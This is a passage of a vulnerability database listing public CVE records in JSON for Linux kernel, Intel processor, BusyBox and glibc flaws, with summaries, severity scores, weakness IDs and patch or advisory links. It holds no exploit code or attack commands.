remotely.\u003c/span\u003e\u003cbr\u003eWe recommend upgrading past commit\u0026nbsp;\u003ca target=\"_blank\" rel=\"nofollow\" href=\"https://www.google.com/url?q=https://github.com/torvalds/linux/commit/b1a2cd50c0357f243b7435a732b4e62ba3157a2e\u0026amp;sa=D\u0026amp;source=buganizer\u0026amp;usg=AOvVaw1MgsfyPTiSrqqs3LAs-ZRS\"\u003ehttps://github.com/torvalds/linux/commit/b1a2cd50c0357f243b7435a732b4e62ba3157a2e\u003c/a\u003e\u003cbr\u003e\u003cbr\u003e" } ], "value": "There is an infoleak vulnerability in the Linux kernel\u0027s net/bluetooth/l2cap_core.c\u0027s l2cap_parse_conf_req function which can be used to leak kernel pointers remotely.\nWe recommend upgrading past commit\u00a0 https://github.com/torvalds/linux/commit/b1a2cd50c0357f243b7435a732b4e62ba3157a2e https://www.google.com/url \n\n" } ], "impacts": [ { "capecId": "CAPEC-410", "descriptions": [ { "lang": "en", "value": "CAPEC-410 Information Elicitation" } ] } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-824", "description": "CWE-824 Access of Uninitialized Pointer", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-11-23T14:14:27.857Z", "orgId": "14ed7db2-1595-443d-9d34-6215bf890778", "shortName": "Google" }, "references": [ { "url": "https://github.com/torvalds/linux/commit/b1a2cd50c0357f243b7435a732b4e62ba3157a2e" }, { "url": "https://kernel.dance/#b1a2cd50c0357f243b7435a732b4e62ba3157a2e" } ], "source": { "discovery": "EXTERNAL" }, "title": "Info Leak in l2cap_core in the Linux Kernel", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778", "assignerShortName": "Google", "cveId": "CVE-2022-42895", "datePublished": "2022-11-23T14:11:33.340Z", "dateReserved": "2022-10-12T18:30:19.769Z", "dateUpdated": "2024-08-03T13:19:05.390Z", "requesterUserId": "ed9b5bb2-2df1-4aa3-9791-5fb260d88e62", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-3521
Vulnerability from cvelistv5
Published
2022-10-16 00:00
Modified
2024-08-03 01:14
Severity ?
EPSS score ?
Summary
A vulnerability has been found in Linux Kernel and classified as problematic. This vulnerability affects the function kcm_tx_work of the file net/kcm/kcmsock.c of the component kcm. The manipulation leads to race condition. It is recommended to apply a patch to fix this issue. VDB-211018 is the identifier assigned to this vulnerability.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T01:14:02.040Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=ec7eede369fe5b0d085ac51fdbb95184f87bfc6c" }, { "tags": [ "x_transferred" ], "url": "https://vuldb.com/?id.211018" }, { "name": "[debian-lts-announce] 20221222 [SECURITY] [DLA 3244-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00031.html" }, { "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Kernel", "vendor": "Linux", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "A vulnerability has been found in Linux Kernel and classified as problematic. This vulnerability affects the function kcm_tx_work of the file net/kcm/kcmsock.c of the component kcm. The manipulation leads to race condition. It is recommended to apply a patch to fix this issue. VDB-211018 is the identifier assigned to this vulnerability." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "LOW", "baseScore": 2.6, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-362", "description": "CWE-362 Race Condition", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-12-24T00:00:00", "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5", "shortName": "VulDB" }, "references": [ { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=ec7eede369fe5b0d085ac51fdbb95184f87bfc6c" }, { "url": "https://vuldb.com/?id.211018" }, { "name": "[debian-lts-announce] 20221222 [SECURITY] [DLA 3244-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00031.html" }, { "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html" } ], "title": "Linux Kernel kcm kcmsock.c kcm_tx_work race condition", "x_generator": "vuldb.com" } }, "cveMetadata": { "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5", "assignerShortName": "VulDB", "cveId": "CVE-2022-3521", "datePublished": "2022-10-16T00:00:00", "dateReserved": "2022-10-16T00:00:00", "dateUpdated": "2024-08-03T01:14:02.040Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-2503
Vulnerability from cvelistv5
Published
2022-08-12 00:00
Modified
2024-08-03 00:39
Severity ?
EPSS score ?
Summary
Dm-verity is used for extending root-of-trust to root filesystems. LoadPin builds on this property to restrict module/firmware loads to just the trusted root filesystem. Device-mapper table reloads currently allow users with root privileges to switch out the target with an equivalent dm-linear target and bypass verification till reboot. This allows root to bypass LoadPin and can be used to load untrusted and unverified kernel modules and firmware, which implies arbitrary kernel execution and persistence for peripherals that do not verify firmware updates. We recommend upgrading past commit 4caae58406f8ceb741603eee460d79bacca9b1b5
References
Impacted products
Vendor | Product | Version | |
---|---|---|---|
▼ | Linux Kernel | Linux Kernel |
Version: unspecified < 4caae58406f8ceb741603eee460d79bacca9b1b5 |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T00:39:07.939Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://github.com/google/security-research/security/advisories/GHSA-6vq3-w69p-w63m" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230214-0005/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Linux Kernel", "vendor": "Linux Kernel", "versions": [ { "lessThan": "4caae58406f8ceb741603eee460d79bacca9b1b5", "status": "affected", "version": "unspecified", "versionType": "custom" } ] } ], "descriptions": [ { "lang": "en", "value": "Dm-verity is used for extending root-of-trust to root filesystems. LoadPin builds on this property to restrict module/firmware loads to just the trusted root filesystem. Device-mapper table reloads currently allow users with root privileges to switch out the target with an equivalent dm-linear target and bypass verification till reboot. This allows root to bypass LoadPin and can be used to load untrusted and unverified kernel modules and firmware, which implies arbitrary kernel execution and persistence for peripherals that do not verify firmware updates. We recommend upgrading past commit 4caae58406f8ceb741603eee460d79bacca9b1b5" } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-302", "description": "CWE-302 Authentication Bypass by Assumed-Immutable Data", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-02-14T00:00:00", "orgId": "14ed7db2-1595-443d-9d34-6215bf890778", "shortName": "Google" }, "references": [ { "url": "https://github.com/google/security-research/security/advisories/GHSA-6vq3-w69p-w63m" }, { "url": "https://security.netapp.com/advisory/ntap-20230214-0005/" } ], "source": { "discovery": "INTERNAL" }, "title": "Linux Kernel LoadPin bypass via dm-verity table reload", "x_generator": { "engine": "Vulnogram 0.0.9" } } }, "cveMetadata": { "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778", "assignerShortName": "Google", "cveId": "CVE-2022-2503", "datePublished": "2022-08-12T00:00:00", "dateReserved": "2022-07-21T00:00:00", "dateUpdated": "2024-08-03T00:39:07.939Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-1012
Vulnerability from cvelistv5
Published
2022-08-05 00:00
Modified
2024-08-02 23:47
Severity ?
EPSS score ?
Summary
A memory leak problem was found in the TCP source port generation algorithm in net/ipv4/tcp.c due to the small table perturb size. This flaw may allow an attacker to information leak and may cause a denial of service problem.
References
Impacted products
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T23:47:42.922Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://lore.kernel.org/lkml/20220427065233.2075-1-w%401wt.eu/T/" }, { "tags": [ "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2064604" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20221020-0006/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Linux kernel version prior to 5.18-rc6" } ] } ], "descriptions": [ { "lang": "en", "value": "A memory leak problem was found in the TCP source port generation algorithm in net/ipv4/tcp.c due to the small table perturb size. This flaw may allow an attacker to information leak and may cause a denial of service problem." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-401", "description": "CWE-401", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-10-20T00:00:00", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://lore.kernel.org/lkml/20220427065233.2075-1-w%401wt.eu/T/" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2064604" }, { "url": "https://security.netapp.com/advisory/ntap-20221020-0006/" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2022-1012", "datePublished": "2022-08-05T00:00:00", "dateReserved": "2022-03-17T00:00:00", "dateUpdated": "2024-08-02T23:47:42.922Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-3628
Vulnerability from cvelistv5
Published
2023-01-12 00:00
Modified
2024-08-03 01:14
Severity ?
EPSS score ?
Summary
A buffer overflow flaw was found in the Linux kernel Broadcom Full MAC Wi-Fi driver. This issue occurs when a user connects to a malicious USB device. This can allow a local user to crash the system or escalate their privileges.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T01:14:02.991Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/patch/drivers/net/wireless/broadcom/brcm80211/brcmfmac/fweh.c?id=6788ba8aed4e28e90f72d68a9d794e34eac17295" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Linux kernel 6.1-rc5" } ] } ], "descriptions": [ { "lang": "en", "value": "A buffer overflow flaw was found in the Linux kernel Broadcom Full MAC Wi-Fi driver. This issue occurs when a user connects to a malicious USB device. This can allow a local user to crash the system or escalate their privileges." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-119", "description": "CWE-119", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-01-12T00:00:00", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/patch/drivers/net/wireless/broadcom/brcm80211/brcmfmac/fweh.c?id=6788ba8aed4e28e90f72d68a9d794e34eac17295" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2022-3628", "datePublished": "2023-01-12T00:00:00", "dateReserved": "2022-10-21T00:00:00", "dateUpdated": "2024-08-03T01:14:02.991Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-26373
Vulnerability from cvelistv5
Published
2022-08-18 00:00
Modified
2024-08-03 05:03
Severity ?
EPSS score ?
Summary
Non-transparent sharing of return predictor targets between contexts in some Intel(R) Processors may allow an authorized user to potentially enable information disclosure via local access.
References
Impacted products
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | Intel(R) Processors |
Version: See references |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T05:03:32.895Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00706.html" }, { "name": "[debian-lts-announce] 20220911 [SECURITY] [DLA 3102-1] linux-5.10 new package", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/09/msg00011.html" }, { "name": "[debian-lts-announce] 20221002 [SECURITY] [DLA 3131-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00000.html" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20221007-0005/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Intel(R) Processors", "vendor": "n/a", "versions": [ { "status": "affected", "version": "See references" } ] } ], "descriptions": [ { "lang": "en", "value": "Non-transparent sharing of return predictor targets between contexts in some Intel(R) Processors may allow an authorized user to potentially enable information disclosure via local access." } ], "problemTypes": [ { "descriptions": [ { "description": "information disclosure", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-10-07T00:00:00", "orgId": "6dda929c-bb53-4a77-a76d-48e79601a1ce", "shortName": "intel" }, "references": [ { "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00706.html" }, { "name": "[debian-lts-announce] 20220911 [SECURITY] [DLA 3102-1] linux-5.10 new package", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/09/msg00011.html" }, { "name": "[debian-lts-announce] 20221002 [SECURITY] [DLA 3131-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00000.html" }, { "url": "https://security.netapp.com/advisory/ntap-20221007-0005/" } ] } }, "cveMetadata": { "assignerOrgId": "6dda929c-bb53-4a77-a76d-48e79601a1ce", "assignerShortName": "intel", "cveId": "CVE-2022-26373", "datePublished": "2022-08-18T00:00:00", "dateReserved": "2022-05-11T00:00:00", "dateUpdated": "2024-08-03T05:03:32.895Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-28391
Vulnerability from cvelistv5
Published
2022-04-03 20:20
Modified
2024-08-03 05:56
Severity ?
EPSS score ?
Summary
BusyBox through 1.35.0 allows remote attackers to execute arbitrary code if netstat is used to print a DNS PTR record's value to a VT compatible terminal. Alternatively, the attacker could choose to change the terminal's colors.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T05:56:15.214Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://gitlab.alpinelinux.org/alpine/aports/-/issues/13661" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://git.alpinelinux.org/aports/plain/main/busybox/0001-libbb-sockaddr2str-ensure-only-printable-characters-.patch" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://git.alpinelinux.org/aports/plain/main/busybox/0002-nslookup-sanitize-all-printed-strings-with-printable.patch" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "BusyBox through 1.35.0 allows remote attackers to execute arbitrary code if netstat is used to print a DNS PTR record\u0027s value to a VT compatible terminal. Alternatively, the attacker could choose to change the terminal\u0027s colors." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-04-03T20:20:12", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://gitlab.alpinelinux.org/alpine/aports/-/issues/13661" }, { "tags": [ "x_refsource_MISC" ], "url": "https://git.alpinelinux.org/aports/plain/main/busybox/0001-libbb-sockaddr2str-ensure-only-printable-characters-.patch" }, { "tags": [ "x_refsource_MISC" ], "url": "https://git.alpinelinux.org/aports/plain/main/busybox/0002-nslookup-sanitize-all-printed-strings-with-printable.patch" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2022-28391", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "BusyBox through 1.35.0 allows remote attackers to execute arbitrary code if netstat is used to print a DNS PTR record\u0027s value to a VT compatible terminal. Alternatively, the attacker could choose to change the terminal\u0027s colors." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://gitlab.alpinelinux.org/alpine/aports/-/issues/13661", "refsource": "MISC", "url": "https://gitlab.alpinelinux.org/alpine/aports/-/issues/13661" }, { "name": "https://git.alpinelinux.org/aports/plain/main/busybox/0001-libbb-sockaddr2str-ensure-only-printable-characters-.patch", "refsource": "MISC", "url": "https://git.alpinelinux.org/aports/plain/main/busybox/0001-libbb-sockaddr2str-ensure-only-printable-characters-.patch" }, { "name": "https://git.alpinelinux.org/aports/plain/main/busybox/0002-nslookup-sanitize-all-printed-strings-with-printable.patch", "refsource": "MISC", "url": "https://git.alpinelinux.org/aports/plain/main/busybox/0002-nslookup-sanitize-all-printed-strings-with-printable.patch" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2022-28391", "datePublished": "2022-04-03T20:20:12", "dateReserved": "2022-04-03T00:00:00", "dateUpdated": "2024-08-03T05:56:15.214Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2020-10029
Vulnerability from cvelistv5
Published
2020-03-04 00:00
Modified
2024-08-04 10:50
Severity ?
EPSS score ?
Summary
The GNU C Library (aka glibc or libc6) before 2.32 could overflow an on-stack buffer during range reduction if an input to an 80-bit long double function contains a non-canonical bit pattern, a seen when passing a 0x5d414141414141410000 value to sinl on x86 targets. This is related to sysdeps/ieee754/ldbl-96/e_rem_pio2l.c.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T10:50:57.842Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=25487" }, { "tags": [ "x_transferred" ], "url": "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Ba=commit%3Bh=9333498794cde1d5cca518badf79533a24114b6f" }, { "name": "openSUSE-SU-2020:0381", "tags": [ "vendor-advisory", "x_transferred" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00033.html" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20200327-0003/" }, { "name": "FEDORA-2020-444c372453", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/23N76M3EDP2GIW4GOIQRYTKRE7PPBRB2/" }, { "name": "FEDORA-2020-244efc27af", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VU5JJGENOK7K4X5RYAA5PL647C6HD22E/" }, { "name": "FEDORA-2020-7f625c5ea8", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JZTFUD5VH2GU3YOXA2KBQSBIDZRDWNZ3/" }, { "name": "GLSA-202006-04", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://security.gentoo.org/glsa/202006-04" }, { "name": "USN-4416-1", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://usn.ubuntu.com/4416-1/" }, { "name": "[debian-lts-announce] 20221017 [SECURITY] [DLA 3152-1] glibc security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "The GNU C Library (aka glibc or libc6) before 2.32 could overflow an on-stack buffer during range reduction if an input to an 80-bit long double function contains a non-canonical bit pattern, a seen when passing a 0x5d414141414141410000 value to sinl on x86 targets. This is related to sysdeps/ieee754/ldbl-96/e_rem_pio2l.c." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-10-17T00:00:00", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=25487" }, { "url": "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Ba=commit%3Bh=9333498794cde1d5cca518badf79533a24114b6f" }, { "name": "openSUSE-SU-2020:0381", "tags": [ "vendor-advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00033.html" }, { "url": "https://security.netapp.com/advisory/ntap-20200327-0003/" }, { "name": "FEDORA-2020-444c372453", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/23N76M3EDP2GIW4GOIQRYTKRE7PPBRB2/" }, { "name": "FEDORA-2020-244efc27af", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VU5JJGENOK7K4X5RYAA5PL647C6HD22E/" }, { "name": "FEDORA-2020-7f625c5ea8", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JZTFUD5VH2GU3YOXA2KBQSBIDZRDWNZ3/" }, { "name": "GLSA-202006-04", "tags": [ "vendor-advisory" ], "url": "https://security.gentoo.org/glsa/202006-04" }, { "name": "USN-4416-1", "tags": [ "vendor-advisory" ], "url": "https://usn.ubuntu.com/4416-1/" }, { "name": "[debian-lts-announce] 20221017 [SECURITY] [DLA 3152-1] glibc security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2020-10029", "datePublished": "2020-03-04T00:00:00", "dateReserved": "2020-03-04T00:00:00", "dateUpdated": "2024-08-04T10:50:57.842Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-42329
Vulnerability from cvelistv5
Published
2022-12-07 00:00
Modified
2024-08-03 13:03
Severity ?
EPSS score ?
Summary
Guests can trigger deadlock in Linux netback driver T[his CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] The patch for XSA-392 introduced another issue which might result in a deadlock when trying to free the SKB of a packet dropped due to the XSA-392 handling (CVE-2022-42328). Additionally when dropping packages for other reasons the same deadlock could occur in case of netpoll being active for the interface the xen-netback driver is connected to (CVE-2022-42329).
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T13:03:45.975Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://xenbits.xenproject.org/xsa/advisory-424.txt" }, { "name": "[oss-security] 20221208 Re: Xen Security Advisory 424 v1 (CVE-2022-42328,CVE-2022-42329) - Guests can trigger deadlock in Linux netback driver", "tags": [ "mailing-list", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2022/12/08/3" }, { "name": "[oss-security] 20221208 Re: Xen Security Advisory 424 v1 (CVE-2022-42328,CVE-2022-42329) - Guests can trigger deadlock in Linux netback driver", "tags": [ "mailing-list", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2022/12/08/2" }, { "name": "[oss-security] 20221209 Re: Xen Security Advisory 424 v1 (CVE-2022-42328,CVE-2022-42329) - Guests can trigger deadlock in Linux netback driver", "tags": [ "mailing-list", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2022/12/09/2" }, { "name": "[debian-lts-announce] 20221222 [SECURITY] [DLA 3244-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00031.html" }, { "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Linux", "vendor": "Linux", "versions": [ { "status": "unknown", "version": "consult Xen advisory XSA-424" } ] } ], "descriptions": [ { "lang": "en", "value": "Guests can trigger deadlock in Linux netback driver T[his CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] The patch for XSA-392 introduced another issue which might result in a deadlock when trying to free the SKB of a packet dropped due to the XSA-392 handling (CVE-2022-42328). Additionally when dropping packages for other reasons the same deadlock could occur in case of netpoll being active for the interface the xen-netback driver is connected to (CVE-2022-42329)." } ], "metrics": [ { "other": { "content": { "description": { "description_data": [ { "lang": "eng", "value": "A malicious guest could cause Denial of Service (DoS) of the host via\nthe paravirtualized network interface." } ] } }, "type": "unknown" } } ], "problemTypes": [ { "descriptions": [ { "description": "unknown", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-12-24T00:00:00", "orgId": "23aa2041-22e1-471f-9209-9b7396fa234f", "shortName": "XEN" }, "references": [ { "url": "https://xenbits.xenproject.org/xsa/advisory-424.txt" }, { "name": "[oss-security] 20221208 Re: Xen Security Advisory 424 v1 (CVE-2022-42328,CVE-2022-42329) - Guests can trigger deadlock in Linux netback driver", "tags": [ "mailing-list" ], "url": "http://www.openwall.com/lists/oss-security/2022/12/08/3" }, { "name": "[oss-security] 20221208 Re: Xen Security Advisory 424 v1 (CVE-2022-42328,CVE-2022-42329) - Guests can trigger deadlock in Linux netback driver", "tags": [ "mailing-list" ], "url": "http://www.openwall.com/lists/oss-security/2022/12/08/2" }, { "name": "[oss-security] 20221209 Re: Xen Security Advisory 424 v1 (CVE-2022-42328,CVE-2022-42329) - Guests can trigger deadlock in Linux netback driver", "tags": [ "mailing-list" ], "url": "http://www.openwall.com/lists/oss-security/2022/12/09/2" }, { "name": "[debian-lts-announce] 20221222 [SECURITY] [DLA 3244-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00031.html" }, { "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html" } ] } }, "cveMetadata": { "assignerOrgId": "23aa2041-22e1-471f-9209-9b7396fa234f", "assignerShortName": "XEN", "cveId": "CVE-2022-42329", "datePublished": "2022-12-07T00:00:00", "dateReserved": "2022-10-03T00:00:00", "dateUpdated": "2024-08-03T13:03:45.975Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-2588
Vulnerability from cvelistv5
Published
2024-01-08 17:50
Modified
2024-08-03 00:39
Severity ?
EPSS score ?
Summary
It was discovered that the cls_route filter implementation in the Linux kernel would not remove an old filter from the hashtable before freeing it if its handle had the value 0.
References
Impacted products
Vendor | Product | Version | |
---|---|---|---|
▼ | The Linux Kernel Organization | linux |
Version: 0 ≤ |
|
